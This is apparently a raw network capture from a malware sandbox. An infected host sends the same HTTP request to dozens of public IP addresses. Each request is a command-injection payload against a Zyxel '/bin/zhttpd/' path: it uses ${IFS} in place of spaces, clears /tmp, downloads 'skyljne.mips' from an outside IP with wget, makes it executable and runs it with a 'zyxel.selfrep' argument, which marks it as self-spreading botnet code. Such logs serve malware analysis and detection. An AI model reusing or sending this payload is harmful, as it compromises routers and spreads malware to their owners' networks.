                                        Jan 14, 2024 16:18:35.227432013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1723192.168.2.1357618192.137.56.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227458954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1724192.168.2.1347412209.64.129.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227492094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1725192.168.2.133479241.15.213.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227540970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1726192.168.2.1333088194.208.8.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227592945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1727192.168.2.1332930201.109.198.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227607012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1728192.168.2.135362284.104.89.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227662086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1729192.168.2.135425673.186.186.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227716923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1730192.168.2.135562462.217.48.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227741957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1731192.168.2.134906899.120.191.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227782965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1732192.168.2.1339186176.137.34.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227834940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1733192.168.2.135542868.139.32.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227849960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1734192.168.2.1341630198.109.10.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227893114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1735192.168.2.1355586200.20.250.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227935076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1736192.168.2.135540824.225.245.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.227976084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1737192.168.2.133965885.228.94.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228023052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1738192.168.2.1356422116.189.210.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228070974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1739192.168.2.134146835.236.205.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228097916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1740192.168.2.134349296.174.95.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228147984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1741192.168.2.1338576129.34.80.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228183031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1742192.168.2.1341906130.32.160.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228235006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1743192.168.2.1338742167.95.46.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228267908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1744192.168.2.1340800207.235.119.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228296995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1745192.168.2.13367981.223.8.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228332043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1746192.168.2.133438078.85.176.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228368044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1747192.168.2.1334292164.123.116.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228413105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1748192.168.2.134553848.122.160.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228440046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1749192.168.2.1349964181.108.227.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228497028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1750192.168.2.1344424134.108.87.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228521109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1751192.168.2.1337010206.30.208.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228564024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1752192.168.2.135927462.172.160.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228615046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1753192.168.2.135272664.148.95.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228655100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1754192.168.2.13339244.176.12.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228702068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1755192.168.2.1345398141.165.1.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228709936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1756192.168.2.1360444219.18.194.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228770971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1757192.168.2.1359812195.30.226.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228827000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1758192.168.2.1336372117.59.168.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228846073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1759192.168.2.1338280150.162.111.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228867054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1760192.168.2.1345568120.155.99.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228919983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1761192.168.2.1336200145.0.204.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228959084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1762192.168.2.135624483.39.228.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.228998899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1763192.168.2.133925492.118.6.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229047060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1764192.168.2.1355132168.231.150.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229087114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1765192.168.2.135163642.237.101.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229115963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1766192.168.2.13335522.63.44.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229163885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1767192.168.2.1339372126.117.124.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229208946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1768192.168.2.133332470.215.2.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229262114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1769192.168.2.134901619.161.138.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229302883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1770192.168.2.1353472130.32.252.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229336977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1771192.168.2.1360364120.11.152.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229382038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1772192.168.2.135815479.229.174.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229434013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1773192.168.2.134955273.36.189.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229475975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1774192.168.2.133533013.37.137.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229517937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1775192.168.2.1355916173.135.43.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229551077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1776192.168.2.1357216120.254.107.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229602098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1777192.168.2.134234242.89.99.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229629993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1778192.168.2.1333918222.185.137.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229691982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1779192.168.2.1357320139.139.174.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229717970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1780192.168.2.135071887.86.110.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229751110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1781192.168.2.1338812112.197.122.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229779005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1782192.168.2.133525439.243.8.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229832888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1783192.168.2.133298266.248.166.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229861975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1784192.168.2.1357030168.249.168.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.229897976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1785192.168.2.135417045.79.128.92443
                                        TimestampBytes transferredDirectionData
